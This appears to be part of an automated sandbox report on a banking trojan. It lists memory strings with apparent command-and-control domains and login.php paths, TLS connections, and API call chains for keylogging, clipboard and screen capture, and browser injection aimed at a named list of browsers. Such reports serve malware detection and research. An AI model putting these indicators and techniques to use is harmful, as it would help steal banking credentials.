Source: svchost.exe, 00000002.00000003.1638510682.000000000CCD6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1667217481.000000000CCD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654486120.000000000CCD5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1790516365.000000000CCD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comte
Source: svchost.exe, 00000002.00000003.1475968169.0000000000867000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654486120.000000000CCD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtv
Source: svchost.exe, 00000002.00000003.1690843138.0000000005AC4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498566877.000000000328D000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009322000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009270000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1960183690.0000000009470000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F93000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696169271.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651367571.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666830881.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741320070.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/
Source: svchost.exe, 00000002.00000003.1868222111.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743301063.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1764721323.0000000005AAD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2686660345.0000000000848000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080135300.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1754662746.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789844614.000000000333F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1563997171.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580889706.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1943197013.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586990670.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738014937.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609404650.0000000005B8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1764529443.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845987393.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1908395491.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1737220209.0000000005A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1737220209.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1739889236.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711149824.0000000003386000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559995578.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522451091.000000000333A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1734298880.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735224157.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1732988011.0000000005A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595511474.0000000005A1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693475153.000000000CCAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1764529443.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1520950909.000000000333A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1737220209.0000000005A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1732988011.0000000005A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53549
Source: unknownNetwork traffic detected: HTTP traffic on port 63212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53543
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53540
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53531 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 53540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53554
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53531
Source: unknownNetwork traffic detected: HTTP traffic on port 61823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63211
Source: unknownNetwork traffic detected: HTTP traffic on port 53543 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63213
Source: unknownHTTPS traffic detected: 75.2.71.199:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:63211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:63213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:61823 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:61824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53540 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53543 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53554 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\apppatch\svchost.exe Code function: [tab] 2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe Code function: [del] 2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe Code function: [ins] 2_2_02C81B80
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C81E60 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock, 2_2_02C81E60
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C78630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard, 2_2_02C78630
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_01418630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_01418630
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_01388630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_01388630
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_03218630 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,GetLastError,EmptyClipboard,SetClipboardData,CloseClipboard, 10_2_03218630
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C93950 GetDesktopWindow,GetWindowDC,CreateCompatibleDC,PathAddBackslashA,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,WriteFile,ReleaseDC, 2_2_02C93950
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C81B80 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii, 2_2_02C81B80

E-Banking Fraud

Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe| 2_2_02C86370
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, 
\chrome.exe 2_2_02C85890
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C85890, same API call chain as the entry above, with the strings \iexplore.exe, \firefox.exe and \tbb-firefox.exe
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe5_2_01425890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01426370
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|5_2_01413510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01395890
